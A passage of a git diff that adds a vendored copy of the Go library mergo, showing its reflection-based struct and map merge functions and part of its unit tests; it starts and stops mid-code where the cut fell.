dstKind := dstElement.Kind() + srcKind := srcElement.Kind() + if srcKind == reflect.Ptr && dstKind != reflect.Ptr { + srcElement = srcElement.Elem() + srcKind = reflect.TypeOf(srcElement.Interface()).Kind() + } else if dstKind == reflect.Ptr { + // Can this work? I guess it can't. + if srcKind != reflect.Ptr && srcElement.CanAddr() { + srcPtr := srcElement.Addr() + srcElement = reflect.ValueOf(srcPtr) + srcKind = reflect.Ptr + } + } + + if !srcElement.IsValid() { + continue + } + if srcKind == dstKind { + if err = deepMerge(dstElement, srcElement, visited, depth+1, config); err != nil { + return + } + } else if dstKind == reflect.Interface && dstElement.Kind() == reflect.Interface { + if err = deepMerge(dstElement, srcElement, visited, depth+1, config); err != nil { + return + } + } else if srcKind == reflect.Map { + if err = deepMap(dstElement, srcElement, visited, depth+1, config); err != nil { + return + } + } else { + return fmt.Errorf("type mismatch on %s field: found %v, expected %v", fieldName, srcKind, dstKind) + } + } + } + return +} + +// Map sets fields' values in dst from src. +// src can be a map with string keys or a struct. dst must be the opposite: +// if src is a map, dst must be a valid pointer to struct. If src is a struct, +// dst must be map[string]interface{}. +// It won't merge unexported (private) fields and will do recursively +// any exported field. +// If dst is a map, keys will be src fields' names in lower camel case. +// Missing key in src that doesn't match a field in dst will be skipped. This +// doesn't apply if dst is a map. +// This is separated method from Merge because it is cleaner and it keeps sane +// semantics: merging equal types, mapping different (restricted) types. +func Map(dst, src interface{}, opts ...func(*Config)) error { + return _map(dst, src, opts...) +} + +// MapWithOverwrite will do the same as Map except that non-empty dst attributes will be overridden by +// non-empty src attribute values. +// Deprecated: Use Map(…) with WithOverride +func MapWithOverwrite(dst, src interface{}, opts ...func(*Config)) error { + return _map(dst, src, append(opts, WithOverride)...) +} + +func _map(dst, src interface{}, opts ...func(*Config)) error { + var ( + vDst, vSrc reflect.Value + err error + ) + config := &Config{} + + for _, opt := range opts { + opt(config) + } + + if vDst, vSrc, err = resolveValues(dst, src); err != nil { + return err + } + // To be friction-less, we redirect equal-type arguments + // to deepMerge. Only because arguments can be anything. + if vSrc.Kind() == vDst.Kind() { + return deepMerge(vDst, vSrc, make(map[uintptr]*visit), 0, config) + } + switch vSrc.Kind() { + case reflect.Struct: + if vDst.Kind() != reflect.Map { + return ErrExpectedMapAsDestination + } + case reflect.Map: + if vDst.Kind() != reflect.Struct { + return ErrExpectedStructAsDestination + } + default: + return ErrNotSupported + } + return deepMap(vDst, vSrc, make(map[uintptr]*visit), 0, config) +} diff --git a/vendor/github.com/imdario/mergo/merge.go b/vendor/github.com/imdario/mergo/merge.go new file mode 100644 index 0000000000..706b22069c --- /dev/null +++ b/vendor/github.com/imdario/mergo/merge.go @@ -0,0 +1,245 @@ +// Copyright 2013 Dario Castañé. All rights reserved. +// Copyright 2009 The Go Authors. All rights reserved. +// Use of this source code is governed by a BSD-style +// license that can be found in the LICENSE file. + +// Based on src/pkg/reflect/deepequal.go from official +// golang's stdlib. + +package mergo + +import ( + "reflect" +) + +func hasExportedField(dst reflect.Value) (exported bool) { + for i, n := 0, dst.NumField(); i < n; i++ { + field := dst.Type().Field(i) + if field.Anonymous && dst.Field(i).Kind() == reflect.Struct { + exported = exported || hasExportedField(dst.Field(i)) + } else { + exported = exported || len(field.PkgPath) == 0 + } + } + return +} + +type Config struct { + Overwrite bool + AppendSlice bool + Transformers Transformers +} + +type Transformers interface { + Transformer(reflect.Type) func(dst, src reflect.Value) error +} + +// Traverses recursively both values, assigning src's fields values to dst. +// The map argument tracks comparisons that have already been seen, which allows +// short circuiting on recursive types. +func deepMerge(dst, src reflect.Value, visited map[uintptr]*visit, depth int, config *Config) (err error) { + overwrite := config.Overwrite + + if !src.IsValid() { + return + } + if dst.CanAddr() { + addr := dst.UnsafeAddr() + h := 17 * addr + seen := visited[h] + typ := dst.Type() + for p := seen; p != nil; p = p.next { + if p.ptr == addr && p.typ == typ { + return nil + } + } + // Remember, remember... + visited[h] = &visit{addr, typ, seen} + } + + if config.Transformers != nil && !isEmptyValue(dst) { + if fn := config.Transformers.Transformer(dst.Type()); fn != nil { + err = fn(dst, src) + return + } + } + + switch dst.Kind() { + case reflect.Struct: + if hasExportedField(dst) { + for i, n := 0, dst.NumField(); i < n; i++ { + if err = deepMerge(dst.Field(i), src.Field(i), visited, depth+1, config); err != nil { + return + } + } + } else { + if dst.CanSet() && !isEmptyValue(src) && (overwrite || isEmptyValue(dst)) { + dst.Set(src) + } + } + case reflect.Map: + if dst.IsNil() && !src.IsNil() { + dst.Set(reflect.MakeMap(dst.Type())) + } + for _, key := range src.MapKeys() { + srcElement := src.MapIndex(key) + if !srcElement.IsValid() { + continue + } + dstElement := dst.MapIndex(key) + switch srcElement.Kind() { + case reflect.Chan, reflect.Func, reflect.Map, reflect.Interface, reflect.Slice: + if srcElement.IsNil() { + continue + } + fallthrough + default: + if !srcElement.CanInterface() { + continue + } + switch reflect.TypeOf(srcElement.Interface()).Kind() { + case reflect.Struct: + fallthrough + case reflect.Ptr: + fallthrough + case reflect.Map: + srcMapElm := srcElement + dstMapElm := dstElement + if srcMapElm.CanInterface() { + srcMapElm = reflect.ValueOf(srcMapElm.Interface()) + if dstMapElm.IsValid() { + dstMapElm = reflect.ValueOf(dstMapElm.Interface()) + } + } + if err = deepMerge(dstMapElm, srcMapElm, visited, depth+1, config); err != nil { + return + } + case reflect.Slice: + srcSlice := reflect.ValueOf(srcElement.Interface()) + + var dstSlice reflect.Value + if !dstElement.IsValid() || dstElement.IsNil() { + dstSlice = reflect.MakeSlice(srcSlice.Type(), 0, srcSlice.Len()) + } else { + dstSlice = reflect.ValueOf(dstElement.Interface()) + } + + if !isEmptyValue(src) && (overwrite || isEmptyValue(dst)) && !config.AppendSlice { + dstSlice = srcSlice + } else if config.AppendSlice { + dstSlice = reflect.AppendSlice(dstSlice, srcSlice) + } + dst.SetMapIndex(key, dstSlice) + } + } + if dstElement.IsValid() && reflect.TypeOf(srcElement.Interface()).Kind() == reflect.Map { + continue + } + + if srcElement.IsValid() && (overwrite || (!dstElement.IsValid() || isEmptyValue(dstElement))) { + if dst.IsNil() { + dst.Set(reflect.MakeMap(dst.Type())) + } + dst.SetMapIndex(key, srcElement) + } + } + case reflect.Slice: + if !dst.CanSet() { + break + } + if !isEmptyValue(src) && (overwrite || isEmptyValue(dst)) && !config.AppendSlice { + dst.Set(src) + } else if config.AppendSlice { + dst.Set(reflect.AppendSlice(dst, src)) + } + case reflect.Ptr: + fallthrough + case reflect.Interface: + if src.IsNil() { + break + } + if src.Kind() != reflect.Interface { + if dst.IsNil() || overwrite { + if dst.CanSet() && (overwrite || isEmptyValue(dst)) { + dst.Set(src) + } + } else if src.Kind() == reflect.Ptr { + if err = deepMerge(dst.Elem(), src.Elem(), visited, depth+1, config); err != nil { + return + } + } else if dst.Elem().Type() == src.Type() { + if err = deepMerge(dst.Elem(), src, visited, depth+1, config); err != nil { + return + } + } else { + return ErrDifferentArgumentsTypes + } + break + } + if dst.IsNil() || overwrite { + if dst.CanSet() && (overwrite || isEmptyValue(dst)) { + dst.Set(src) + } + } else if err = deepMerge(dst.Elem(), src.Elem(), visited, depth+1, config); err != nil { + return + } + default: + if dst.CanSet() && !isEmptyValue(src) && (overwrite || isEmptyValue(dst)) { + dst.Set(src) + } + } + return +} + +// Merge will fill any empty for value type attributes on the dst struct using corresponding +// src attributes if they themselves are not empty. dst and src must be valid same-type structs +// and dst must be a pointer to struct. +// It won't merge unexported (private) fields and will do recursively any exported field. +func Merge(dst, src interface{}, opts ...func(*Config)) error { + return merge(dst, src, opts...) +} + +// MergeWithOverwrite will do the same as Merge except that non-empty dst attributes will be overriden by +// non-empty src attribute values. +// Deprecated: use Merge(…) with WithOverride +func MergeWithOverwrite(dst, src interface{}, opts ...func(*Config)) error { + return merge(dst, src, append(opts, WithOverride)...) +} + +// WithTransformers adds transformers to merge, allowing to customize the merging of some types. +func WithTransformers(transformers Transformers) func(*Config) { + return func(config *Config) { + config.Transformers = transformers + } +} + +// WithOverride will make merge override non-empty dst attributes with non-empty src attributes values. +func WithOverride(config *Config) { + config.Overwrite = true +} + +// WithAppendSlice will make merge append slices instead of overwriting it +func WithAppendSlice(config *Config) { + config.AppendSlice = true +} + +func merge(dst, src interface{}, opts ...func(*Config)) error { + var ( + vDst, vSrc reflect.Value + err error + ) + + config := &Config{} + + for _, opt := range opts { + opt(config) + } + + if vDst, vSrc, err = resolveValues(dst, src); err != nil { + return err + } + if vDst.Type() != vSrc.Type() { + return ErrDifferentArgumentsTypes + } + return deepMerge(vDst, vSrc, make(map[uintptr]*visit), 0, config) +} diff --git a/vendor/github.com/imdario/mergo/merge_appendslice_test.go b/vendor/github.com/imdario/mergo/merge_appendslice_test.go new file mode 100644 index 0000000000..a780f34a3c --- /dev/null +++ b/vendor/github.com/imdario/mergo/merge_appendslice_test.go @@ -0,0 +1,33 @@ +package mergo + +import ( + "testing" +) + +var testDataS = []struct { + S1 Student + S2 Student + ExpectedSlice []string +}{ + {Student{"Jack", []string{"a", "B"}}, Student{"Tom", []string{"1"}}, []string{"1", "a", "B"}}, + {Student{"Jack", []string{"a", "B"}}, Student{"Tom", []string{}}, []string{"a", "B"}}, + {Student{"Jack", []string{}}, Student{"Tom", []string{"1"}}, []string{"1"}}, + {Student{"Jack", []string{}}, Student{"Tom", []string{}}, []string{}}, +} + +func TestMergeSliceWithOverrideWithAppendSlice(t *testing.T) { + for _, data := range testDataS { + err := Merge(&data.S2, data.S1, WithOverride, WithAppendSlice) + if err != nil { + t.Errorf("Error while merging %s", err) + } + if len(data.S2.Books) != len(data.ExpectedSlice) { + t.Fatalf("Got %d elements in slice, but expected %d", len(data.S2.Books), len(data.ExpectedSlice)) + } + for i, val := range data.S2.Books { + if val != data.ExpectedSlice[i] { + t.Fatalf("Expected %s, but got %s while merging slice with override", data.ExpectedSlice[i], val) + } + } + } +} diff --git a/vendor/github.com/imdario/mergo/merge_test.go b/vendor/github.com/imdario/mergo/merge_test.go new file mode 100644 index 0000000000..5bf808a786 --- /dev/null +++ b/vendor/github.com/imdario/mergo/merge_test.go @@ -0,0 +1,50 @@ +package mergo + +import ( + "reflect" + "testing" +) + +type transformer struct { + m map[reflect.Type]func(dst, src reflect.Value) error +} + +func (s *transformer) Transformer(t reflect.Type) func(dst, src reflect.Value) error { + if fn, ok := s.m[t]; ok { + return fn + } + return nil +} + +type foo struct { + s string + Bar *bar +} + +type bar struct { + i int + s map[string]string +} + +func TestMergeWithTransformerNilStruct(t *testing.T) { + a := foo{s: "foo"} + b := foo{Bar: &bar{i: 2, s: map[string]string{"foo": "bar"}}} + if err := Merge(&a, &b, WithOverride, WithTransformers(&transformer{ + m: map[reflect.Type]func(dst, src reflect.Value) error{ + reflect.TypeOf(&bar{}): func(dst, src reflect.Value) error { + // Do sthg with Elem + t.Log(dst.Elem().FieldByName("i")) + t.Log(src.Elem()) + return nil + }, + }, + })); err != nil { + t.Fatal(err) + } + if a.s != "foo" { + t.Fatalf("b not merged in properly: a.s.Value(%s) != expected(%s)", a.s, "foo") + } + if a.Bar == nil { + t.Fatalf("b not merged in properly: a.Bar shouldn't be nil") + } +} diff --git a/vendor/github.com/imdario/mergo/mergo.go b/vendor/github.com/imdario/mergo/mergo.go new file mode 100644 index 0000000000..a82fea2fdc --- /dev/null +++ b/vendor/github.com/imdario/mergo/mergo.go @@ -0,0 +1,97 @@ +// Copyright 2013 Dario Castañé. All rights reserved. +// Copyright 2009 The Go Authors. All rights reserved. +// Use of this source code is governed by a BSD-style +// license that can be found in the LICENSE file. + +// Based on src/pkg/reflect/deepequal.go from official +// golang's stdlib. + +package mergo + +import ( + "errors" + "reflect" +) + +// Errors reported by Mergo when it finds invalid arguments. +var ( + ErrNilArguments = errors.New("src and dst must not be nil") + ErrDifferentArgumentsTypes = errors.New("src and dst must be of same type") + ErrNotSupported = errors.New("only structs and maps are supported") + ErrExpectedMapAsDestination = errors.New("dst was expected to be a map") + ErrExpectedStructAsDestination = errors.New("dst was expected to be a struct") +) + +// During deepMerge, must keep track of checks that are +// in progress. The comparison algorithm assumes that all +// checks in progress are true when it reencounters them. +// Visited are stored in a map indexed by 17 * a1 + a2; +type visit struct { + ptr uintptr + typ reflect.Type + next *visit +} + +// From src/pkg/encoding/json/encode.go. +func isEmptyValue(v reflect.Value) bool { + switch v.Kind() { + case reflect.Array, reflect.Map, reflect.Slice, reflect.String: + return v.Len() == 0 + case reflect.Bool: + return !v.Bool() + case reflect.Int, reflect.Int8, reflect.Int16, reflect.Int32, reflect.Int64: + return v.Int() == 0 + case reflect.Uint, reflect.Uint8, reflect.Uint16, reflect.Uint32, reflect.Uint64, reflect.Uintptr: + return v.Uint() == 0 + case reflect.Float32, reflect.Float64: + return v.Float() == 0 + case reflect.Interface, reflect.Ptr: + if v.IsNil() { + return true + } + return isEmptyValue(v.Elem()) + case reflect.Func: + return v.IsNil() + case reflect.Invalid: + return true + } + return false +} + +func resolveValues(dst, src interface{}) (vDst, vSrc reflect.Value, err error) { + if dst == nil || src == nil { + err = ErrNilArguments + return + } + vDst = reflect.ValueOf(dst).Elem() + if vDst.Kind() != reflect.Struct && vDst.Kind() != reflect.Map { + err = ErrNotSupported + return + } + vSrc = reflect.ValueOf(src) + // We check if vSrc is a pointer to dereference it. + if vSrc.Kind() == reflect.Ptr { + vSrc = vSrc.Elem() + } + return +} + +// Traverses recursively both values, assigning src's fields values to dst. +// The map argument tracks comparisons that have already been seen, which allows +// short circuiting on recursive types. +func deeper(dst, src reflect.Value, visited map[uintptr]*visit, depth int) (err error) { + if dst.CanAddr() { + addr := dst.UnsafeAddr() + h := 17 * addr + seen := visited[h] + typ := dst.Type() + for p := seen; p != nil; p = p.next { + if p.ptr == addr && p.typ == typ { + return nil + } + } + // Remember, remember... + visited[h] = &visit{addr, typ, seen} + } + return // TODO refactor +} diff --git a/vendor/github.com/imdario/mergo/mergo_test.go b/vendor/github.com/imdario/mergo/mergo_test.go new file mode 100644 index 0000000000..d777538431 --- /dev/null +++ b/vendor/github.com/imdario/mergo/mergo_test.go @@ -0,0 +1,733 @@ +// Copyright 2013 Dario Castañé. All rights reserved. +// Copyright 2009 The Go Authors. All rights reserved. +// Use of this source code is governed by a BSD-style +// license that can be found in the LICENSE file. + +package mergo + +import ( + "io/ioutil" + "reflect" + "testing" + "time" + + "gopkg.in/yaml.v2" +) + +type simpleTest struct { + Value int +} + +type complexTest struct { + St simpleTest + sz int + ID string +} + +type mapTest struct { + M map[int]int +} + +type ifcTest struct { + I interface{} +} + +type moreComplextText struct { + Ct complexTest + St simpleTest + Nt simpleTest +} + +type pointerTest struct { + C *simpleTest +} + +type sliceTest struct { + S []int +} + +func TestKb(t *testing.T) { + type testStruct struct { + Name string + KeyValue map[string]interface{} + } + + akv := make(map[string]interface{}) + akv["Key1"] = "not value 1" + akv["Key2"] = "value2" + a := testStruct{} + a.Name = "A" + a.KeyValue = akv + + bkv := make(map[string]interface{}) + bkv["Key1"] = "value1" + bkv["Key3"] = "value3" + b := testStruct{} + b.Name = "B" + b.KeyValue = bkv + + ekv := make(map[string]interface{}) + ekv["Key1"] = "value1" + ekv["Key2"] = "value2" + ekv["Key3"] = "value3" + expected := testStruct{} + expected.Name = "B" + expected.KeyValue = ekv + + Merge(&b, a) + + if !reflect.DeepEqual(b, expected) { + t.Errorf("Actual: %#v did not match \nExpected: %#v", b, expected) + } +} + +func TestNil(t *testing.T) { + if err := Merge(nil, nil); err != ErrNilArguments { + t.Fail() + } +} + +func TestDifferentTypes(t *testing.T) { + a := simpleTest{42} + b := 42 + if err := Merge(&a, b); err != ErrDifferentArgumentsTypes { + t.Fail() + } +} + +func TestSimpleStruct(t *testing.T) { + a := simpleTest{} + b := simpleTest{42} + if err := Merge(&a, b); err != nil { + t.FailNow() + } + if a.Value != 42 { + t.Fatalf("b not merged in properly: a.Value(%d) != b.Value(%d)", a.Value, b.Value) + } + if !reflect.DeepEqual(a, b) { + t.FailNow() + } +} + +func TestComplexStruct(t *testing.T) { + a := complexTest{} + a.ID = "athing" + b := complexTest{simpleTest{42}, 1, "bthing"} + if err := Merge(&a, b); err != nil { + t.FailNow() + } + if a.St.Value != 42 { + t.Fatalf("b not merged in properly: a.St.Value(%d) != b.St.Value(%d)", a.St.Value, b.St.Value) + } + if a.sz == 1 { + t.Fatalf("a's private field sz not preserved from merge: a.sz(%d) == b.sz(%d)", a.sz, b.sz) + } + if a.ID == b.ID { + t.Fatalf("a's field ID merged unexpectedly: a.ID(%s) == b.ID(%s)", a.ID, b.ID) + } +} + +func TestComplexStructWithOverwrite(t *testing.T) { + a := complexTest{simpleTest{1}, 1, "do-not-overwrite-with-empty-value"} + b := complexTest{simpleTest{42}, 2, ""} + + expect := complexTest{simpleTest{42}, 1, "do-not-overwrite-with-empty-value"} + if err := MergeWithOverwrite(&a, b); err != nil { + t.FailNow() + } + + if !reflect.DeepEqual(a, expect) { + t.Fatalf("Test failed:\ngot :\n%#v\n\nwant :\n%#v\n\n", a, expect) + } +} + +func TestPointerStruct(t *testing.T) { + s1 := simpleTest{} + s2 := simpleTest{19} + a := pointerTest{&s1} + b := pointerTest{&s2} + if err := Merge(&a, b); err != nil { + t.FailNow() + } + if a.C.Value != b.C.Value { + t.Fatalf("b not merged in properly: a.C.Value(%d) != b.C.Value(%d)", a.C.Value, b.C.Value) + } +} + +type embeddingStruct struct { + embeddedStruct +} + +type embeddedStruct struct { + A string +} + +func TestEmbeddedStruct(t *testing.T) { + tests := []struct { + src embeddingStruct + dst embeddingStruct + expected embeddingStruct + }{ + { + src: embeddingStruct{ + embeddedStruct{"foo"}, + }, + dst: embeddingStruct{ + embeddedStruct{""}, + }, + expected: embeddingStruct{ + embeddedStruct{"foo"}, + }, + }, + { + src: embeddingStruct{ + embeddedStruct{""}, + }, + dst: embeddingStruct{ + embeddedStruct{"bar"}, + }, + expected: embeddingStruct{ + embeddedStruct{"bar"}, + }, + }, + { + src: embeddingStruct{ + embeddedStruct{"foo"}, + }, + dst: embeddingStruct{ + embeddedStruct{"bar"}, + }, + expected: embeddingStruct{ + embeddedStruct{"bar"}, + }, + }, + } + + for _, test := range tests { + err := Merge(&test.dst, test.src) + if err != nil { + t.Errorf("unexpected error: %v", err) + continue + } + if !reflect.DeepEqual(test.dst, test.expected) { + t.Errorf("unexpected output\nexpected:\n%+v\nsaw:\n%+v\n", test.expected, test.dst) + } + } +} + +func TestPointerStructNil(t *testing.T) { + a := pointerTest{nil} + b := pointerTest{&simpleTest{19}} + if err := Merge(&a, b); err != nil { + t.FailNow() + } + if a.C.Value != b.C.Value { + t.Fatalf("b not merged in a properly: a.C.Value(%d) != b.C.Value(%d)", a.C.Value, b.C.Value) + } +} + +func testSlice(t *testing.T, a []int, b []int, e []int, opts ...func(*Config)) { + t.Helper() + bc := b + + sa := sliceTest{a} + sb := sliceTest{b} + if err := Merge(&sa, sb, opts...); err != nil { + t.FailNow() + } + if !reflect.DeepEqual(sb.S, bc) { + t.Fatalf("Source slice was modified %d != %d", sb.S, bc) + } + if !reflect.DeepEqual(sa.S, e) { + t.Fatalf("b not merged in a proper way %d != %d", sa.S, e) + } + + ma := map[string][]int{"S": a} + mb := map[string][]int{"S": b} + if err := Merge(&ma, mb, opts...); err != nil { + t.FailNow() + } + if !reflect.DeepEqual(mb["S"], bc) { + t.Fatalf("map value: Source slice was modified %d != %d", mb["S"], bc) + } + if !reflect.DeepEqual(ma["S"], e) { + t.Fatalf("map value: b not merged in a proper way %d != %d", ma["S"], e) + } + + if a == nil { + // test case with missing dst key + ma := map[string][]int{} + mb := map[string][]int{"S": b} + if err := Merge(&ma, mb); err != nil { + t.FailNow() + } + if !reflect.DeepEqual(mb["S"], bc) { + t.Fatalf("missing dst key: Source slice was modified %d != %d", mb["S"], bc) + } + if !reflect.DeepEqual(ma["S"], e) { + t.Fatalf("missing dst key: b not merged in a proper way %d != %d", ma["S"], e) + } + } + + if b == nil { + // test case with missing src key + ma := map[string][]int{"S": a} + mb := map[string][]int{} + if err := Merge(&ma, mb); err != nil { + t.FailNow() + } + if !reflect.DeepEqual(mb["S"], bc) { + t.Fatalf("missing src key: Source slice was modified %d != %d", mb["S"], bc) + } + if !reflect.DeepEqual(ma["S"], e) { + t.Fatalf("missing src key: b not merged in a proper way %d != %d", ma["S"], e) + } + } +} + +func TestSlice(t *testing.T) { + testSlice(t, nil, []int{1, 2, 3}, []int{1, 2, 3}) + testSlice(t, []int{}, []int{1, 2, 3}, []int{1, 2, 3}) + testSlice(t, []int{1}, []int{2, 3}, []int{1}) + testSlice(t, []int{1}, []int{}, []int{1}) + testSlice(t, []int{1}, nil, []int{1}) + testSlice(t, nil, []int{1, 2, 3}, []int{1, 2, 3}, WithAppendSlice) + testSlice(t, []int{}, []int{1, 2, 3}, []int{1, 2, 3}, WithAppendSlice) + testSlice(t, []int{1}, []int{2, 3}, []int{1, 2, 3}, WithAppendSlice) + testSlice(t, []int{1}, []int{}, []int{1}, WithAppendSlice) + testSlice(t, []int{1}, nil, []int{1}, WithAppendSlice) +} + +func TestEmptyMaps(t *testing.T) { + a := mapTest{} + b := mapTest{ + map[int]int{}, + } + if err := Merge(&a, b); err != nil { + t.Fail() + } + if !reflect.DeepEqual(a, b) { + t.FailNow() + } +} + +func TestEmptyToEmptyMaps(t *testing.T) { + a := mapTest{} + b := mapTest{} + if err := Merge(&a, b); err != nil { + t.Fail() + } + if !reflect.DeepEqual(a, b) { + t.FailNow() + } +} + +func TestEmptyToNotEmptyMaps(t *testing.T) { + a := mapTest{map[int]int{ + 1: 2, + 3: 4, + }} + aa := mapTest{map[int]int{ + 1: 2, + 3: 4, + }} + b := mapTest{ + map[int]int{}, + } + if err := Merge(&a, b); err != nil { + t.Fail() + } + if !reflect.DeepEqual(a, aa) { + t.FailNow() + } +} + +func TestMapsWithOverwrite(t *testing.T) { + m := map[string]simpleTest{ + "a": {}, // overwritten by 16 + "b": {42}, // not overwritten by empty value + "c": {13}, // overwritten by 12 + "d": {61}, + } + n := map[string]simpleTest{ + "a": {16}, + "b": {}, + "c": {12}, + "e": {14}, + } + expect := map[string]simpleTest{ + "a": {16}, + "b": {}, + "c": {12}, + "d": {61}, + "e": {14}, + } + + if err := MergeWithOverwrite(&m, n); err != nil { + t.Fatalf(err.Error()) + } + + if !reflect.DeepEqual(m, expect) { + t.Fatalf("Test failed:\ngot :\n%#v\n\nwant :\n%#v\n\n", m, expect) + } +} + +func TestMaps(t *testing.T) { + m := map[string]simpleTest{ + "a": {}, + "b": {42}, + "c": {13}, + "d": {61}, + } + n := map[string]simpleTest{ + "a": {16}, + "b": {}, + "c": {12}, + "e": {14}, + } + expect := map[string]simpleTest{ + "a": {0}, + "b": {42}, + "c": {13}, + "d": {61}, + "e": {14}, + } + + if err := Merge(&m, n); err != nil { + t.Fatalf(err.Error()) + } + + if !reflect.DeepEqual(m, expect) { + t.Fatalf("Test failed:\ngot :\n%#v\n\nwant :\n%#v\n\n", m, expect) + } + if m["a"].Value != 0 { + t.Fatalf(`n merged in m because I solved non-addressable map values TODO: m["a"].Value(%d) != n["a"].Value(%d)`, m["a"].Value, n["a"].Value) + } + if m["b"].Value != 42 { + t.Fatalf(`n wrongly merged in m: m["b"].Value(%d) != n["b"].Value(%d)`, m["b"].Value, n["b"].Value) + } + if m["c"].Value != 13 { + t.Fatalf(`n overwritten in m: m["c"].Value(%d) != n["c"].Value(%d)`, m["c"].Value, n["c"].Value) + } +} + +func TestMapsWithNilPointer(t *testing.T) { + m := map[string]*simpleTest{ + "a": nil, + "b": nil, + } + n := map[string]*simpleTest{ + "b": nil, + "c": nil, + } + expect := map[string]*simpleTest{ + "a": nil, + "b": nil, + "c": nil, + } + + if err := Merge(&m, n, WithOverride); err != nil { + t.Fatalf(err.Error()) + } + + if !reflect.DeepEqual(m, expect) { + t.Fatalf("Test failed:\ngot :\n%#v\n\nwant :\n%#v\n\n", m, expect) + } +} + +func TestYAMLMaps(t *testing.T) { + thing := loadYAML("testdata/thing.yml") + license := loadYAML("testdata/license.yml") + ft := thing["fields"].(map[interface{}]interface{}) + fl := license["fields"].(map[interface{}]interface{}) + // license has one extra field (site) and another already existing in thing (author) that Mergo won't override. + expectedLength := len(ft) + len(fl) - 1 + if err := Merge(&license, thing); err != nil { + t.Fatal(err.Error()) + } + currentLength := len(license["fields"].(map[interface{}]interface{})) + if currentLength != expectedLength { + t.Fatalf(`thing not merged in license properly, license must have %d elements instead of %d`, expectedLength, currentLength) + } + fields := license["fields"].(map[interface{}]interface{}) + if _, ok := fields["id"]; !ok { + t.Fatalf(`thing not merged in license properly, license must have a new id field from thing`) + } +} + +func TestTwoPointerValues(t *testing.T) { + a := &simpleTest{} + b := &simpleTest{42} + if err := Merge(a, b); err != nil { + t.Fatalf(`Boom. You crossed the streams: %s`, err) + } +} + +func TestMap(t *testing.T) { + a := complexTest{} + a.ID = "athing" + c := moreComplextText{a, simpleTest{}, simpleTest{}} + b := map[string]interface{}{ + "ct": map[string]interface{}{ + "st": map[string]interface{}{ + "value": 42, + }, + "sz": 1, + "id": "bthing", + }, + "st": &simpleTest{144}, // Mapping a reference + "zt": simpleTest{299}, // Mapping a missing field (zt doesn't exist) + "nt": simpleTest{3}, + } + if err := Map(&c, b); err != nil { + t.FailNow() + } + m := b["ct"].(map[string]interface{}) + n := m["st"].(map[string]interface{}) + o := b["st"].(*simpleTest) + p := b["nt"].(simpleTest) + if c.Ct.St.Value != 42 { + t.Fatalf("b not merged in properly: c.Ct.St.Value(%d) != b.Ct.St.Value(%d)", c.Ct.St.Value, n["value"]) + } + if c.St.Value != 144 { + t.Fatalf("b not merged in properly: c.St.Value(%d) != b.St.Value(%d)", c.St.Value, o.Value) + } + if c.Nt.Value != 3 { + t.Fatalf("b not merged in properly: c.Nt.Value(%d) != b.Nt.Value(%d)", c.St.Value, p.Value) + } + if c.Ct.sz == 1 { + t.Fatalf("a's private field sz not preserved from merge: c.Ct.sz(%d) == b.Ct.sz(%d)", c.Ct.sz, m["sz"]) + } + if c.Ct.ID == m["id"] { + t.Fatalf("a's field ID merged unexpectedly: c.Ct.ID(%s) == b.Ct.ID(%s)", c.Ct.ID, m["id"]) + } +} + +func TestSimpleMap(t *testing.T) { + a := simpleTest{} + b := map[string]interface{}{ + "value": 42, + } + if err := Map(&a, b); err != nil { + t.FailNow() + } + if a.Value != 42 { + t.Fatalf("b not merged in properly: a.Value(%d) != b.Value(%v)", a.Value, b["value"]) + } +} + +func TestIfcMap(t *testing.T) { + a := ifcTest{} + b := ifcTest{42} + if err := Map(&a, b); err != nil { + t.FailNow() + } + if a.I != 42 { + t.Fatalf("b not merged in properly: a.I(%d) != b.I(%d)", a.I, b.I) + } + if !reflect.DeepEqual(a, b) { + t.FailNow() + } +} + +func TestIfcMapNoOverwrite(t *testing.T) { + a := ifcTest{13} + b := ifcTest{42} + if err := Map(&a, b); err != nil { + t.FailNow() + } + if a.I != 13 { + t.Fatalf("a not left alone: a.I(%d) == b.I(%d)", a.I, b.I) + } +} + +func TestIfcMapWithOverwrite(t *testing.T) { + a := ifcTest{13} + b := ifcTest{42} + if err := MapWithOverwrite(&a, b); err != nil { + t.FailNow() + } + if a.I != 42 { + t.Fatalf("b not merged in properly: a.I(%d) != b.I(%d)", a.I, b.I) + } + if !reflect.DeepEqual(a, b) { + t.FailNow() + } +} + +type pointerMapTest struct { + A int + hidden int + B *simpleTest +} + +func TestBackAndForth(t *testing.T) { + pt := pointerMapTest{42, 1, &simpleTest{66}} + m := make(map[string]interface{}) + if err := Map(&m, pt); err != nil { + t.FailNow() + } + var ( + v interface{} + ok bool + ) + if v, ok = m["a"]; v.(int) != pt.A || !ok { + t.Fatalf("pt not merged in properly: m[`a`](%d) != pt.A(%d)", v, pt.A) + } + if v, ok = m["b"]; !ok { + t.Fatalf("pt not merged in properly: B is missing in m") + } + var st *simpleTest + if st = v.(*simpleTest); st.Value != 66 { + t.Fatalf("something went wrong while mapping pt on m, B wasn't copied") + } + bpt := pointerMapTest{} + if err := Map(&bpt, m); err != nil { + t.Fatal(err) + } + if bpt.A != pt.A { + t.Fatalf("pt not merged in properly: bpt.A(%d) != pt.A(%d)", bpt.A, pt.A) + } + if bpt.hidden == pt.hidden { + t.Fatalf("pt unexpectedly merged: bpt.hidden(%d) == pt.hidden(%d)", bpt.hidden, pt.hidden) + } + if bpt.B.Value != pt.B.Value { + t.Fatalf("pt not merged in properly: bpt.B.Value(%d) != pt.B.Value(%d)", bpt.B.Value, pt.B.Value) + } +} + +func TestEmbeddedPointerUnpacking(t *testing.T) { + tests := []struct{ input pointerMapTest }{ + {pointerMapTest{42, 1, nil}}, + {pointerMapTest{42, 1, &simpleTest{66}}}, + } + newValue := 77 + m := map[string]interface{}{ + "b": map[string]interface{}{ + "value": newValue, + }, + } + for _, test := range tests { + pt := test.input + if err := MapWithOverwrite(&pt, m); err != nil { + t.FailNow() + } + if pt.B.Value != newValue { + t.Fatalf("pt not mapped properly: pt.A.Value(%d) != m[`b`][`value`](%d)", pt.B.Value, newValue) + } + + } +} + +type structWithTimePointer struct { + Birth *time.Time +} + +func TestTime(t *testing.T) { + now := time.Now() + dataStruct := structWithTimePointer{ + Birth: &now, + } + dataMap := map[string]interface{}{ + "Birth": &now, + } + b := structWithTimePointer{} + if err := Merge(&b, dataStruct); err != nil { + t.FailNow() + } + if b.Birth.IsZero() { + t.Fatalf("time.Time not merged in properly: b.Birth(%v) != dataStruct['Birth'](%v)", b.Birth, dataStruct.Birth) + } + if b.Birth != dataStruct.Birth { + t.Fatalf("time.Time not merged in properly: b.Birth(%v) != dataStruct['Birth'](%v)", b.Birth, dataStruct.Birth) + } + b = structWithTimePointer{} + if err := Map(&b, dataMap); err != nil { + t.FailNow() + 